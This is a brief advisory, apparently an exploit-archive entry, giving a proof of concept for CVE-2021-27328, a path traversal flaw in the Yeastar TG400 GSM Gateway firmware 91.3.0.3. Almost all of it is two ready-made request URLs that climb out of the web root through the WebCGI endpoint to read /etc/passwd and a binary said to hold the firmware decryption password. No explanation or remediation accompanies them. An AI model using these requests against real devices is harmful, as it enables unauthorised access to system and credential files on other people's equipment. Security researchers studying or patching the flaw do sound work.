Yeastar TG400 GSM Gateway version 91.3.0.3 suffers from a path traversal vulnerability.
f44bbe91ca4f8dfdd5196a1e8f1790d712feb6f1c16a29856640d2d4a7faab8f
Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3
This is a Proof of Concept for CVE-2021-27328
Example
to get firmware decrypting password
https://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
to get /etc/paswd
https://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd